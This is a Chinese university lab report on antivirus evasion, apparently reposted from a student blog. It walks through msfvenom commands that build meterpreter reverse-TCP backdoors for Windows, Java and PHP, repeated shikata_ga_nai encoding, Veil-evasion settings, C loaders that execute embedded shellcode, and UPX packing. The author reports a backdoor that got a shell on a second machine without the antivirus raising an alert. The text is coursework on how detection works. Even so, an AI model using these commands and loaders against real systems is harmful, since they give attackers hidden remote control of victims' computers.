码迷,mamicode.com
首页 > 其他好文 > 详细

2018-2019-2 网络对抗技术 20165228 Exp3 免杀原理与实践

时间:2019-03-28 09:45:24      阅读:158      评论:0      收藏:0      [点我收藏+]

标签:x64   实践   ++   恶意代码   word   恶意软件   ima   rtu   验证   

2018-2019-2 网络对抗技术 20165228 Exp3 免杀原理与实践

免杀
   一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。
   反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。

1、杀软是如何检测出恶意代码的?

  • 基于特征码:杀软会将恶意代码中有明显特征的一部分作为特征码,并建立起特征库,在检测时则比对特征码是否匹配。
  • 基于行为:杀软会监控运行的程序,像进行修改系统注册表、启动项等可疑操作的的程序就可能是恶意代码。
    2、免杀是做什么?
  • 让后门程序不被杀软检测出来
    3、免杀的基本方法有哪些?
  • msfvenom直接生成、msfvenom多次编码、Veil-evasion、C+shellcode、UPX压缩壳、Hyperion
    4、离实战还缺些什么技术或步骤?
  • 缺少将后门植入的操作:比如把后门安插到正常的软件包中,或者利用目标机已有的软件漏洞实现后门植入。

    实验内容

    任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;

    1、使用msf编码器
  • 通过上个实验中学到的命令生成后门程序
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 43.171 LPORT=5228 -f exe > met.exe
    技术图片

  • 将生成的程序上传到virus total试试结果
    技术图片

  • 使用msf编码器对后门程序编码10次
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.43.171 LPORT=5228 -f exe > met-encoded10.exe
    技术图片

  • 再上传到virus total试试免杀操作是否有效
    技术图片

2、使用msfvenom生成jar

  • 使用Java后门程序生成命令
    msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.43.171 lport=5228 x> 20165228_backdoor_java.jar
    技术图片
    3、使用msfvenom生成php
  • 使用php后门程序生成命令
    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.217.128 lport=443 x> 20165228_backdoor.php
    技术图片

4、使用veil-evasion
我的kali版本比较新,好像说比较新的版本没有自带的veil....
于是,先>!%^_&&%,再^*&^(^%%+##,最后@$#%^%&^&&&,我的veil终于能用了。
。 。 。 。 。此处省略一天一夜

  • 设置veil
use evasion
use 7
set LHOST 192.168.43.171 
set LPORT 5228

技术图片

  • 然后输入后门程序的文件名就可以啦
    技术图片

  • 于是把它挂上virus total看看表现如何
    技术图片

5、利用shellcode编程

  • 先执行shellcode生成命令
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.171 LPORT=5228 -f c
  • 得到shellcode
    技术图片

    任务二:Linux平台交叉编译Windows应用

    1、使用交叉编译
  • 新建.c文件,将shellcode和c代码组合到一起
vim 5228met.c
unsigned char buf[] = 
将shellcode替换到此处
int main()
{
    int (*func)() = (int(*)())buf;
    func();
}
  • 执行i686-w64-mingw32-g++ met.c -o met.exe生成可执行的后门程序

  • 然后把它挂上virus total测一下
    技术图片

2、使用`c+shellcode+加壳

  • 原理:将shellcode替换到以上代码的数组后给编译生成的EXE文件加壳中达到免杀效果
  • 制作用C调用shellcode的代码

    include "stdafx.h"

    include <windows.h>

    include <winbase.h>

    include <stdio.h>

    include <stdlib.h>

    include <string.h>

//192.168.6.129 443 reverse_tcp
const char met[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"此处省去若干行"
"\x53\xff\xd5";

int main()
{
DWORD old = 0;
BOOL ret = VirtualProtect((LPVOID)met, strlen(met), PAGE_EXECUTE_READWRITE, &old);
INT32 * addr;
addr =(INT32*) &met;

__asm;
{
    call addr;
}
return 0;

}
- 加压缩壳upx cal.exe -o cal_upxed.exe```
技术图片

  • 使用杀软扫描,未报警,达到免杀效果(其实不加壳我的杀软也不报警...)
    技术图片

任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

  • kali进入msf控制台配置 ip和端口
  • 开始监听
  • 受控机运行后门程序,成功获得shell,且杀软未报警
    技术图片

    问题

  • 在安装veil时遇到了很多不明的问题... 执行veil-evasion安装veil时经常会卡进度TAT
    解决:参考相关博客,最后进入/opt/Veil-Evasion运行,/Veil-Evasion.py就成功啦
  • 在交叉编译时出现以下错误:
    技术图片
    解决 :我的kali里没有自带的minw64编译器,所以需要sudo apt-get install mingw-w64来安装。

实验感想

  • 此次实验让我对免杀技术有了新的认识,比如通过不同的编程语言重写、多次编码等,都是十分新鲜的东西。不过也让我认识到安装杀软有时候可能并没有什么用,它只能按照已有的特征码或者比较有效的启发式鉴别木马和后门程序,虽然病毒库随时都在更新,但像实验中刚做出来的后门程序肯定不在病毒库之列,于是它就可以为所欲为。所以,为了系统安全和信息不泄露,就要谨慎冲浪,即使是软件官网的安装包,也要验证md5值后再下载安装,从根源上避免问题。

2018-2019-2 网络对抗技术 20165228 Exp3 免杀原理与实践

标签:x64   实践   ++   恶意代码   word   恶意软件   ima   rtu   验证   

原文地址:https://www.cnblogs.com/cloud795/p/10611622.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!